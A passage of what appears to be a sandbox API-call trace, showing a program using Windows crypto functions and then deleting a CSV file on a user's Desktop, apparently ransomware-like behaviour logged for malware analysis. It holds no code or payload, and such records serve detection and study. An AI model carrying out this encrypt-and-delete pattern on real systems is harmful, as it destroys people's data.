hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0205.101] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0205.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.101] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0205.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0205.101] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0205.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0205.102] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0205.103] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0205.103] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0205.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0205.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0205.103] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0205.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0205.103] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0205.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0205.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0205.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0205.104] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0205.104] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0205.104] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0205.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0205.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0205.105] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0205.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0205.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0205.105] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0205.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0205.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0205.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0205.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0205.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0205.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0205.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0205.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0205.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0205.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0205.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0205.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0205.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0205.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0205.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0205.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0205.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0205.107] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0205.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.108] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0205.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0205.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0205.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0205.109] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.109] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0205.109] FreeLibrary (hLibModule=0x756e0000) returned 1 [0205.109] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.109] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.109] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.109] CloseHandle (hObject=0x2a0) returned 1 [0205.110] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.110] CloseHandle (hObject=0x2d0) returned 1 [0205.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.141] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.141] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0205.142] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/pGS8H.csv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\pGS8H.csv", lpFilePart=0x8cedf4*="pGS8H.csv") returned 0x21 [0205.142] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\pGS8H.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\pgs8h.csv")) returned 0x20 [0205.142] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\pGS8H.csv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadcb2240, ftCreationTime.dwHighDateTime=0x1d5e3be, ftLastAccessTime.dwLowDateTime=0x4cafb650, ftLastAccessTime.dwHighDateTime=0x1d5e6e9, ftLastWriteTime.dwLowDateTime=0x4cafb650, ftLastWriteTime.dwHighDateTime=0x1d5e6e9, nFileSizeHigh=0x0, nFileSizeLow=0x150f1, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="pGS8H.csv", cAlternateFileName="")) returned 0xa87050 [0205.142] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\pGS8H.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\pgs8h.csv")) returned 1 [0205.190] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadcb2240, ftCreationTime.dwHighDateTime=0x1d5e3be, ftLastAccessTime.dwLowDateTime=0x4cafb650, ftLastAccessTime.dwHighDateTime=0x1d5e6e9, ftLastWriteTime.dwLowDateTime=0x4cafb650, ftLastWriteTime.dwHighDateTime=0x1d5e6e9, nFileSizeHigh=0x0, nFileSizeLow=0x150f1, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="pGS8H.csv", cAlternateFileName="")) returned 0 [0205.190] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0205.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: 